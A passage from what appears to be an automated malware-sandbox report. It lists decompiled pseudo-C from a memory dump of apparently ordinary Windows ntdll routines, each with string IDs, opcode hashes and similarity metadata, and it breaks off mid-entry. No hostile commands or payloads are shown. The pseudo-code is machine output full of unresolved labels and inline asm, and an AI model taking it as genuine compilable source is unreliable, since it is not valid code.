                                                                        				intOrPtr _v40;
                                                                        				void* __ebx;
                                                                        				void* _t35;
                                                                        				signed int _t42;
                                                                        				char* _t48;
                                                                        				signed int _t59;
                                                                        				signed char _t61;
                                                                        				signed int* _t79;
                                                                        				void* _t88;
                                                                        
                                                                        				_v28 = __edx;
                                                                        				_t79 = __ecx;
                                                                        				if(E015A07DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
                                                                        					L13:
                                                                        					_t35 = 0;
                                                                        					L14:
                                                                        					return _t35;
                                                                        				}
                                                                        				_t61 = __ecx[1];
                                                                        				_t59 = __ecx[0xf];
                                                                        				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
                                                                        				_v36 = _a8 << 0xc;
                                                                        				_t42 =  *(_t59 + 0xc) & 0x40000000;
                                                                        				asm("sbb esi, esi");
                                                                        				_t88 = ( ~_t42 & 0x0000003c) + 4;
                                                                        				if(_t42 != 0) {
                                                                        					_push(0);
                                                                        					_push(0x14);
                                                                        					_push( &_v24);
                                                                        					_push(3);
                                                                        					_push(_t59);
                                                                        					_push(0xffffffff);
                                                                        					if(E01519730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
                                                                        						_push(_t61);
                                                                        						E0159A80D(_t59, 1, _v20, 0);
                                                                        						_t88 = 4;
                                                                        					}
                                                                        				}
                                                                        				_t35 = E0159A854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
                                                                        				if(_t35 < 0) {
                                                                        					goto L14;
                                                                        				}
                                                                        				E015A1293(_t79, _v40, E015A07DF(_t79, _v28,  &_a4,  &_a8, 1));
                                                                        				if(E014F7D50() == 0) {
                                                                        					_t48 = 0x7ffe0380;
                                                                        				} else {
                                                                        					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                        				}
                                                                        				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                                                        					E0159138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
                                                                        				}
                                                                        				goto L13;
                                                                        			}


                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: `
                                                                        • API String ID: 0-2679148245
                                                                        • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                        • Instruction ID: ce6ec432aeac0f4a9b41bd1bab38f2855ca4375f6d5396730793753dafd4e02a
                                                                        • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                        • Instruction Fuzzy Hash: 18310E32640716ABE720DE28CD84F9E7BD9BBC4758F144229FA489F2C0D670E905CBA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 72%
                                                                        			E01553884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
                                                                        				char _v8;
                                                                        				intOrPtr _v12;
                                                                        				intOrPtr* _v16;
                                                                        				char* _v20;
                                                                        				short _v22;
                                                                        				char _v24;
                                                                        				intOrPtr _t38;
                                                                        				short _t40;
                                                                        				short _t41;
                                                                        				void* _t44;
                                                                        				intOrPtr _t47;
                                                                        				void* _t48;
                                                                        
                                                                        				_v16 = __edx;
                                                                        				_t40 = 0x14;
                                                                        				_v24 = _t40;
                                                                        				_t41 = 0x16;
                                                                        				_v22 = _t41;
                                                                        				_t38 = 0;
                                                                        				_v12 = __ecx;
                                                                        				_push( &_v8);
                                                                        				_push(0);
                                                                        				_push(0);
                                                                        				_push(2);
                                                                        				_t43 =  &_v24;
                                                                        				_v20 = L"BinaryName";
                                                                        				_push( &_v24);
                                                                        				_push(__ecx);
                                                                        				_t47 = 0;
                                                                        				_t48 = E01519650();
                                                                        				if(_t48 >= 0) {
                                                                        					_t48 = 0xc000090b;
                                                                        				}
                                                                        				if(_t48 != 0xc0000023) {
                                                                        					_t44 = 0;
                                                                        					L13:
                                                                        					if(_t48 < 0) {
                                                                        						L16:
                                                                        						if(_t47 != 0) {
                                                                        							L014F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
                                                                        						}
                                                                        						L18:
                                                                        						return _t48;
                                                                        					}
                                                                        					 *_v16 = _t38;
                                                                        					 *_a4 = _t47;
                                                                        					goto L18;
                                                                        				}
                                                                        				_t47 = L014F4620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
                                                                        				if(_t47 != 0) {
                                                                        					_push( &_v8);
                                                                        					_push(_v8);
                                                                        					_push(_t47);
                                                                        					_push(2);
                                                                        					_push( &_v24);
                                                                        					_push(_v12);
                                                                        					_t48 = E01519650();
                                                                        					if(_t48 < 0) {
                                                                        						_t44 = 0;
                                                                        						goto L16;
                                                                        					}
                                                                        					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
                                                                        						_t48 = 0xc000090b;
                                                                        					}
                                                                        					_t44 = 0;
                                                                        					if(_t48 < 0) {
                                                                        						goto L16;
                                                                        					} else {
                                                                        						_t17 = _t47 + 0xc; // 0xc
                                                                        						_t38 = _t17;
                                                                        						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
                                                                        							_t48 = 0xc000090b;
                                                                        						}
                                                                        						goto L13;
                                                                        					}
                                                                        				}
                                                                        				_t48 = _t48 + 0xfffffff4;
                                                                        				goto L18;
                                                                        			}


                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: BinaryName
                                                                        • API String ID: 0-215506332
                                                                        • Opcode ID: 8e0255805761fba50bc9c0f043a8f9c40ba95cddd3f72371536b2b457a805924
                                                                        • Instruction ID: e1ac0b2867d0565a4095fad223b9b0b238b215d6f0bb30f404735834bdc4f6fd
                                                                        • Opcode Fuzzy Hash: 8e0255805761fba50bc9c0f043a8f9c40ba95cddd3f72371536b2b457a805924
                                                                        • Instruction Fuzzy Hash: DE31E5B290151AAFEB95DE59C965D6FFBB4FF80B60F01416AED18AB250D7309E00C7A0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 33%
                                                                        			E0150D294(void* __ecx, char __edx, void* __eflags) {
                                                                        				signed int _v8;
                                                                        				char _v52;
                                                                        				signed int _v56;
                                                                        				signed int _v60;
                                                                        				intOrPtr _v64;
                                                                        				char* _v68;
                                                                        				intOrPtr _v72;
                                                                        				char _v76;
                                                                        				signed int _v84;
                                                                        				intOrPtr _v88;
                                                                        				char _v92;
                                                                        				intOrPtr _v96;
                                                                        				intOrPtr _v100;
                                                                        				char _v104;
                                                                        				char _v105;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t35;
                                                                        				char _t38;
                                                                        				signed int _t40;
                                                                        				signed int _t44;
                                                                        				signed int _t52;
                                                                        				void* _t53;
                                                                        				void* _t55;
                                                                        				void* _t61;
                                                                        				intOrPtr _t62;
                                                                        				void* _t64;
                                                                        				signed int _t65;
                                                                        				signed int _t66;
                                                                        
                                                                        				_t68 = (_t66 & 0xfffffff8) - 0x6c;
                                                                        				_v8 =  *0x15cd360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
                                                                        				_v105 = __edx;
                                                                        				_push( &_v92);
                                                                        				_t52 = 0;
                                                                        				_push(0);
                                                                        				_push(0);
                                                                        				_push( &_v104);
                                                                        				_push(0);
                                                                        				_t59 = __ecx;
                                                                        				_t55 = 2;
                                                                        				if(E014F4120(_t55, __ecx) < 0) {
                                                                        					_t35 = 0;
                                                                        					L8:
                                                                        					_pop(_t61);
                                                                        					_pop(_t64);
                                                                        					_pop(_t53);
                                                                        					return E0151B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
                                                                        				}
                                                                        				_v96 = _v100;
                                                                        				_t38 = _v92;
                                                                        				if(_t38 != 0) {
                                                                        					_v104 = _t38;
                                                                        					_v100 = _v88;
                                                                        					_t40 = _v84;
                                                                        				} else {
                                                                        					_t40 = 0;
                                                                        				}
                                                                        				_v72 = _t40;
                                                                        				_v68 =  &_v104;
                                                                        				_push( &_v52);
                                                                        				_v76 = 0x18;
                                                                        				_push( &_v76);
                                                                        				_v64 = 0x40;
                                                                        				_v60 = _t52;
                                                                        				_v56 = _t52;
                                                                        				_t44 = E015198D0();
                                                                        				_t62 = _v88;
                                                                        				_t65 = _t44;
                                                                        				if(_t62 != 0) {
                                                                        					asm("lock xadd [edi], eax");
                                                                        					if((_t44 | 0xffffffff) != 0) {
                                                                        						goto L4;
                                                                        					}
                                                                        					_push( *((intOrPtr*)(_t62 + 4)));
                                                                        					E015195D0();
                                                                        					L014F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
                                                                        					goto L4;
                                                                        				} else {
                                                                        					L4:
                                                                        					L014F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
                                                                        					if(_t65 >= 0) {
                                                                        						_t52 = 1;
                                                                        					} else {
                                                                        						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
                                                                        							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
                                                                        						}
                                                                        					}
                                                                        					_t35 = _t52;
                                                                        					goto L8;
                                                                        				}
                                                                        			}


                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @
                                                                        • API String ID: 0-2766056989
                                                                        • Opcode ID: ea7222e29f9242ef361af52f441ced161f99fa01f5835f8bee2512032076cbe9
                                                                        • Instruction ID: 991d5a2a5e92e00f6ee4f2daa71da9fe9dbe221670d1579f371a67f7a193e10f
                                                                        • Opcode Fuzzy Hash: ea7222e29f9242ef361af52f441ced161f99fa01f5835f8bee2512032076cbe9
                                                                        • Instruction Fuzzy Hash: A9318FB55083069FD312DFE8C9809AFBBF8FB95654F00092EF9958B290D634DD04CB92
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 72%
                                                                        			E014E1B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
                                                                        				intOrPtr _v8;
                                                                        				char _v16;
                                                                        				intOrPtr* _t26;
                                                                        				intOrPtr _t29;
                                                                        				void* _t30;
                                                                        				signed int _t31;
                                                                        
                                                                        				_t27 = __ecx;
                                                                        				_t29 = __edx;
                                                                        				_t31 = 0;
                                                                        				_v8 = __edx;
                                                                        				if(__edx == 0) {
                                                                        					L18:
                                                                        					_t30 = 0xc000000d;
                                                                        					goto L12;
                                                                        				} else {
                                                                        					_t26 = _a4;
                                                                        					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
                                                                        						goto L18;
                                                                        					} else {
                                                                        						E0151BB40(__ecx,  &_v16, __ecx);
                                                                        						_push(_t26);
                                                                        						_push(0);
                                                                        						_push(0);
                                                                        						_push(_t29);
                                                                        						_push( &_v16);
                                                                        						_t30 = E0151A9B0();
                                                                        						if(_t30 >= 0) {
                                                                        							_t19 =  *_t26;
                                                                        							if( *_t26 != 0) {
                                                                        								goto L7;
                                                                        							} else {
                                                                        								 *_a8 =  *_a8 & 0;
                                                                        							}
                                                                        						} else {
                                                                        							if(_t30 != 0xc0000023) {
                                                                        								L9:
                                                                        								_push(_t26);
                                                                        								_push( *_t26);
                                                                        								_push(_t31);
                                                                        								_push(_v8);
                                                                        								_push( &_v16);
                                                                        								_t30 = E0151A9B0();
                                                                        								if(_t30 < 0) {
                                                                        									L12:
                                                                        									if(_t31 != 0) {
                                                                        										L014F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
                                                                        									}
                                                                        								} else {
                                                                        									 *_a8 = _t31;
                                                                        								}
                                                                        							} else {
                                                                        								_t19 =  *_t26;
                                                                        								if( *_t26 == 0) {
                                                                        									_t31 = 0;
                                                                        								} else {
                                                                        									L7:
                                                                        									_t31 = L014F4620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
                                                                        								}
                                                                        								if(_t31 == 0) {
                                                                        									_t30 = 0xc0000017;
                                                                        								} else {
                                                                        									goto L9;
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				return _t30;
                                                                        			}


                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: WindowsExcludedProcs
                                                                        • API String ID: 0-3583428290
                                                                        • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                        • Instruction ID: 3f4210f4da820a37baade45f814012b802e79b1b73c6fe87b6f78db4d9d5b71d
                                                                        • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                        • Instruction Fuzzy Hash: 8421287A941519ABEB329A598944F6FBBEDFF84A51F050466FA04CF210D630DD11CBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E014FF716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
                                                                        				intOrPtr _t13;
                                                                        				intOrPtr _t14;
                                                                        				signed int _t16;
                                                                        				signed char _t17;
                                                                        				intOrPtr _t19;
                                                                        				intOrPtr _t21;
                                                                        				intOrPtr _t23;
                                                                        				intOrPtr* _t25;
                                                                        
                                                                        				_t25 = _a8;
                                                                        				_t17 = __ecx;
                                                                        				if(_t25 == 0) {
                                                                        					_t19 = 0xc00000f2;
                                                                        					L8:
                                                                        					return _t19;
                                                                        				}
                                                                        				if((__ecx & 0xfffffffe) != 0) {
                                                                        					_t19 = 0xc00000ef;
                                                                        					goto L8;
                                                                        				}
                                                                        				_t19 = 0;
                                                                        				 *_t25 = 0;
                                                                        				_t21 = 0;
                                                                        				_t23 = "Actx ";
                                                                        				if(__edx != 0) {
                                                                        					if(__edx == 0xfffffffc) {
                                                                        						L21:
                                                                        						_t21 = 0x200;
                                                                        						L5:
                                                                        						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
                                                                        						 *_t25 = _t13;
                                                                        						L6:
                                                                        						if(_t13 == 0) {
                                                                        							if((_t17 & 0x00000001) != 0) {
                                                                        								 *_t25 = _t23;
                                                                        							}
                                                                        						}
                                                                        						L7:
                                                                        						goto L8;
                                                                        					}
                                                                        					if(__edx == 0xfffffffd) {
                                                                        						 *_t25 = _t23;
                                                                        						_t13 = _t23;
                                                                        						goto L6;
                                                                        					}
                                                                        					_t13 =  *((intOrPtr*)(__edx + 0x10));
                                                                        					 *_t25 = _t13;
                                                                        					L14:
                                                                        					if(_t21 == 0) {
                                                                        						goto L6;
                                                                        					}
                                                                        					goto L5;
                                                                        				}
                                                                        				_t14 = _a4;
                                                                        				if(_t14 != 0) {
                                                                        					_t16 =  *(_t14 + 0x14) & 0x00000007;
                                                                        					if(_t16 <= 1) {
                                                                        						_t21 = 0x1f8;
                                                                        						_t13 = 0;
                                                                        						goto L14;
                                                                        					}
                                                                        					if(_t16 == 2) {
                                                                        						goto L21;
                                                                        					}
                                                                        					if(_t16 != 4) {
                                                                        						_t19 = 0xc00000f0;
                                                                        						goto L7;
                                                                        					}
                                                                        					_t13 = 0;
                                                                        					goto L6;
                                                                        				} else {
                                                                        					_t21 = 0x1f8;
                                                                        					goto L5;
                                                                        				}
                                                                        			}












                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Actx
                                                                        • API String ID: 0-89312691
                                                                        • Opcode ID: b476e098644264e9ddd7ab25c0bf2d464a81ad77f83a5ce4e0f6ead38cf0b9b6
                                                                        • Instruction ID: e6f195d14102da669731bcbf292e5ee680c4373d4f7b1d4a08bd40a237fd031f
                                                                        • Opcode Fuzzy Hash: b476e098644264e9ddd7ab25c0bf2d464a81ad77f83a5ce4e0f6ead38cf0b9b6
                                                                        • Instruction Fuzzy Hash: 7011B23B3046428BEB254E1D8490737F6D5AB85624F28452FE761DB3B1DB70D84A8341
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 71%
                                                                        			E01588DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                                                        				intOrPtr _t35;
                                                                        				void* _t41;
                                                                        
                                                                        				_t40 = __esi;
                                                                        				_t39 = __edi;
                                                                        				_t38 = __edx;
                                                                        				_t35 = __ecx;
                                                                        				_t34 = __ebx;
                                                                        				_push(0x74);
                                                                        				_push(0x15b0d50);
                                                                        				E0152D0E8(__ebx, __edi, __esi);
                                                                        				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
                                                                        				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
                                                                        				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
                                                                        					E01565720(0x65, 0, "Critical error detected %lx\n", _t35);
                                                                        					if( *((intOrPtr*)(_t41 + 8)) != 0) {
                                                                        						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
                                                                        						asm("int3");
                                                                        						 *(_t41 - 4) = 0xfffffffe;
                                                                        					}
                                                                        				}
                                                                        				 *(_t41 - 4) = 1;
                                                                        				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
                                                                        				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
                                                                        				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
                                                                        				 *((intOrPtr*)(_t41 - 0x64)) = L0152DEF0;
                                                                        				 *((intOrPtr*)(_t41 - 0x60)) = 1;
                                                                        				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
                                                                        				_push(_t41 - 0x70);
                                                                        				L0152DEF0(1, _t38);
                                                                        				 *(_t41 - 4) = 0xfffffffe;
                                                                        				return E0152D130(_t34, _t39, _t40);
                                                                        			}






                                                                        Strings
                                                                        • Critical error detected %lx, xrefs: 01588E21
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Critical error detected %lx
                                                                        • API String ID: 0-802127002
                                                                        • Opcode ID: 68406f9a085415b29e089c55c4302a50ded78de32ca1799bc4b9304f28250df9
                                                                        • Instruction ID: 3f6d497f6b9e062edfe97fb29905e27f2ec1e182e459317ca2963a38779f8ead
                                                                        • Opcode Fuzzy Hash: 68406f9a085415b29e089c55c4302a50ded78de32ca1799bc4b9304f28250df9
                                                                        • Instruction Fuzzy Hash: BF114272D10349DEDB28DFA8850579CBBB0BB55310F20426EE568AF2D2C3340602CF14
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0156FF60
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                                        • API String ID: 0-1911121157
                                                                        • Opcode ID: dd1f0a37d9878191992ed58028afe19ecf928452116c1515e62ad1ec4e94c51f
                                                                        • Instruction ID: a94acbd10f73f5794c78024e8e1fc2228dc0f501a9976664e174a9e981a32f7a
                                                                        • Opcode Fuzzy Hash: dd1f0a37d9878191992ed58028afe19ecf928452116c1515e62ad1ec4e94c51f
                                                                        • Instruction Fuzzy Hash: 0F110072910185EFEB26EF94C849F9CBBB1FF49B04F248048E5086F6A1C7399940DBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 17ba4cba3e072ae0f4cb1c22605bd46f72c7ea723324a9651a28d4fb93717af3
                                                                        • Instruction ID: 153b95e6c54d2471a1983ea52e81b7c9c36ffac669645878727c3bb62c9b6142
                                                                        • Opcode Fuzzy Hash: 17ba4cba3e072ae0f4cb1c22605bd46f72c7ea723324a9651a28d4fb93717af3
                                                                        • Instruction Fuzzy Hash: 8D426A75950229CFDB20CF68C880BADBBF1FF45304F5981AAD95DAB242E7309A85CF50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 148e7fdef3ae6466c9fc20d5dceeac663c831b2df479aded4ac15b8274354c83
                                                                        • Instruction ID: 94111b48208b59669b76a384bc1bc7de7ed91e23fb080373caf7dce5c8360270
                                                                        • Opcode Fuzzy Hash: 148e7fdef3ae6466c9fc20d5dceeac663c831b2df479aded4ac15b8274354c83
                                                                        • Instruction Fuzzy Hash: 94F17A746082118BD724CF59C481A7BB7E1FF98754F09492EF686CB3A1EB34D886CB52
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6b14d38f2cfc25002c2925af386b89b35502050834d3b60f0185f5d6ff5076dd
                                                                        • Instruction ID: 9ba502e68fe2682ef4f5d706cd10f3e729a68c4563f8442f630a4e9933fbf348
                                                                        • Opcode Fuzzy Hash: 6b14d38f2cfc25002c2925af386b89b35502050834d3b60f0185f5d6ff5076dd
                                                                        • Instruction Fuzzy Hash: ECF1D0356083429FEB27CFA8C44476E7BE1BB95728F08891DE9958F281E774D845CB82
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 554a716109fd9d65ebd0c2b24163ef179955fe87ca1d56361b4b366c54554d2f
                                                                        • Instruction ID: 4cf289a60c3d349afa3c616885798905c75af49575dab7d11eba0e90057a27ca
                                                                        • Opcode Fuzzy Hash: 554a716109fd9d65ebd0c2b24163ef179955fe87ca1d56361b4b366c54554d2f
                                                                        • Instruction Fuzzy Hash: B9E1C134E0075A8FEB35CF68C888B6AB7F2BF85305F05019AD9199B3A1D734A985CF51
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 49633816037948054e3bab46b0ab1233d54ff52b3081f15e17fa440203796e1e
                                                                        • Instruction ID: 822d4cb4d59edb9fc61af09fa684593c03b44c91392999e1e3864cab74f9ee0d
                                                                        • Opcode Fuzzy Hash: 49633816037948054e3bab46b0ab1233d54ff52b3081f15e17fa440203796e1e
                                                                        • Instruction Fuzzy Hash: D3B159B0E0020ADFDF15CFA9C984AADBBF5BF98304F10412AE515AB355D770A946CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b397f2d9472e5f038fead1eb41e2aa2f9899abbee16e45102b367bc68e20acde
                                                                        • Instruction ID: 29eaaf0c30a62fb01c91e3f8473e7578877319e9f96a24d949dbe9c7ad620dc3
                                                                        • Opcode Fuzzy Hash: b397f2d9472e5f038fead1eb41e2aa2f9899abbee16e45102b367bc68e20acde
                                                                        • Instruction Fuzzy Hash: E5C112755083819FD355CF28C480A5AFBF1BF89308F184A6EF9998B392D771E985CB42
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: fd934b0ebfb4131e920435ea7518a06fc95437602490afdcf65086eeccce9bd8
                                                                        • Instruction ID: 7ffa33f70ce70a445051a0ff23fef2717cd09bf4bf4885f2ef1c849d3580c2b2
                                                                        • Opcode Fuzzy Hash: fd934b0ebfb4131e920435ea7518a06fc95437602490afdcf65086eeccce9bd8
                                                                        • Instruction Fuzzy Hash: CF914631E40656AFEB329BACC848BAD7BF4BB05768F060265FA50AF2D1D7749D00C785
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b41af7c20008c12b071f5309b34e0eb4fb6e98988b60c5323f2d58f6c84a07b0
                                                                        • Instruction ID: 140eba336441b736e6070399607a185e6e9123f3d84cb680aa7a9b48c4aedb85
                                                                        • Opcode Fuzzy Hash: b41af7c20008c12b071f5309b34e0eb4fb6e98988b60c5323f2d58f6c84a07b0
                                                                        • Instruction Fuzzy Hash: 4A81AE756442428FDB26CE59C880A6EB7E4FF88258F14482EEE459F241E330ED45CBA2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ec4e2be61a4c710211219f6a053bebb0a3b0e53745616b2375a3c2af2d211596
                                                                        • Instruction ID: 8c595815c7cd43873cac5501c9cc51e572313b7fb49a826da4a865950a0df9d1
                                                                        • Opcode Fuzzy Hash: ec4e2be61a4c710211219f6a053bebb0a3b0e53745616b2375a3c2af2d211596
                                                                        • Instruction Fuzzy Hash: F53132322053519FE7229F59C944B2EBBE6FFD0B10F02182EE9120F254CBB0E844CB89
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 814c48dd1d0aaae70fe5938a07207a423735d283e3ad0f4b4ae1e30dbccc8903
                                                                        • Instruction ID: fa3f5fbf4a2aa55b096d5f5d7fc896314598096c57316e844395cb179f8949a6
                                                                        • Opcode Fuzzy Hash: 814c48dd1d0aaae70fe5938a07207a423735d283e3ad0f4b4ae1e30dbccc8903
                                                                        • Instruction Fuzzy Hash: E741B3B1D003199FDB20CFAAD980AADFBF4FB48710F5041AEE519AB244E7709A84CF50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b7319653f52808e3000b8423a00961b7b28a8a1da5d88dee642798477eb66e88
                                                                        • Instruction ID: 89b34dcdb404cfe871ea288b2553489493dff9788b9ef32a40aaac94bcfbcd55
                                                                        • Opcode Fuzzy Hash: b7319653f52808e3000b8423a00961b7b28a8a1da5d88dee642798477eb66e88
                                                                        • Instruction Fuzzy Hash: 88318D75A14249EFD745CF58C841F9ABBE8FB09314F24865AFA18CB381D631ED80CBA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a22f83f1544b4cbc80ebcb5209d84175d5a49ff888f4a5b85f550a234dd2d432
